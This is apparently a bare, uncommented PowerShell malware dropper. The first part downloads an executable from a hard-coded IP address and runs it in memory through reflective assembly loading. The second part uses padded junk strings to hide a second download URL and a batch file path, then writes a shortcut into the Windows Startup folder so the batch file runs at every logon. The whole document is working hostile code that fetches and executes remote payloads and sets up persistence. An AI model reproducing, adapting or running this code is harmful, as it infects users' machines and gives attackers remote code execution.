function Get-WebClient {
    return New-Object System.Net.WebClient
}

function Get-DownloadUrl {
    $url = "http://92.255.85.207/ret.exe"
    return $url
}

function Download-Assembly {
    param (
        [string]$url
    )
    $client = Get-WebClient
    return $client.DownloadData($url)
}

function Load-Assembly {
    param (
        [byte[]]$data
    )
    return [System.Reflection.Assembly]::Load($data)
}

function Execute-EntryPoint {
    param (
        [System.Reflection.Assembly]$assembly
    )
    $entryPoint = $assembly.EntryPoint
    $entryPoint.Invoke($null, @())
}

$url = Get-DownloadUrl
$downloadedData = Download-Assembly -url $url
$assembly = Load-Assembly -data $downloadedData
Execute-EntryPoint -assembly $assembly


$rnVNFpDvyIkLjFyOq2hpKJ5Ylqm3pR = "FRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRChttp://92.255.85.207/module.batFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRCFRC".replace('FRC','')
$H2OjByV12QssDkOjuEB2vCsMFBpOeygH65hdPTt69MRcft6r9lQnufSr6Co = "MFBpOeygH65hdPTt69MRcft6r9lQnuCMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnu:MFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnuWMFBpOeygH65hdPTt69MRcft6r9lQnuiMFBpOeygH65hdPTt69MRcft6r9lQnunMFBpOeygH65hdPTt69MRcft6r9lQnudMFBpOeygH65hdPTt69MRcft6r9lQnuoMFBpOeygH65hdPTt69MRcft6r9lQnuwsMFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnuTeMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnumpMFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnucmMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnudMFBpOeygH65hdPTt69MRcft6r9lQnu.MFBpOeygH65hdPTt69MRcft6r9lQnubMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnuatMFBpOeygH65hdPTt69MRcft6r9lQnu".replace('MFBpOeygH65hdPTt69MRcft6r9lQnu','')
$cJfQas6ada2z9B6rfUkb6SCxvfJYdT = "$env:APPDATA\MiMFBpOeygH65hdPTt69MRcft6r9lQnucrMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnuosofMFBpOeygH65hdPTt69MRcft6r9lQnut\WiMFBpOeygH65hdPTt69MRcft6r9lQnundMFBpOeygH65hdPTt69MRcft6r9lQnuowMFBpOeygH65hdPTt69MRcft6r9lQnusMFBpOeygH65hdPTt69MRcft6r9lQnu\StMFBpOeygH65hdPTt69MRcft6r9lQnuartMFBpOeygH65hdPTt69MRcft6r9lQnu MeMFBpOeygH65hdPTt69MRcft6r9lQnunuMFBpOeygH65hdPTt69MRcft6r9lQnu\PrMFBpOeygH65hdPTt69MRcft6r9lQnuogMFBpOeygH65hdPTt69MRcft6r9lQnuraMFBpOeygH65hdPTt69MRcft6r9lQnumsMFBpOeygH65hdPTt69MRcft6r9lQnu\StMFBpOeygH65hdPTt69MRcft6r9lQnuMFBpOeygH65hdPTt69MRcft6r9lQnuarMFBpOeygH65hdPTt69MRcft6r9lQnutMFBpOeygH65hdPTt69MRcft6r9lQnuupMFBpOeygH65hdPTt69MRcft6r9lQnu\MFBpOeygH65hdPTt69MRcft6r9lQnuDMFBpOeygH65hdPTt69MRcft6r9lQnueleMFBpOeygH65hdPTt69MRcft6r9lQnuteMFBpOeygH65hdPTt69MRcft6r9lQnuAppMFBpOeygH65hdPTt69MRcft6r9lQnu.url".replace('MFBpOeygH65hdPTt69MRcft6r9lQnu','')

Invoke-WebRequest -Uri $rnVNFpDvyIkLjFyOq2hpKJ5Ylqm3pR -OutFile $H2OjByV12QssDkOjuEB2vCsMFBpOeygH65hdPTt69MRcft6r9lQnufSr6Co

$gMFBpOeygH65hdPTt69MRcft6r9lQnuyONTnWkwmuAA96C12XMHWBsuhRv4 = @"
[InternetShortcut]
URL=file:///$H2OjByV12QssDkOjuEB2vCsMFBpOeygH65hdPTt69MRcft6r9lQnufSr6Co
"@.replace('B','')

Set-Content -Path $cJfQas6ada2z9B6rfUkb6SCxvfJYdT -Value $gMFBpOeygH65hdPTt69MRcft6r9lQnuyONTnWkwmuAA96C12XMHWBsuhRv4 -Encoding ASCII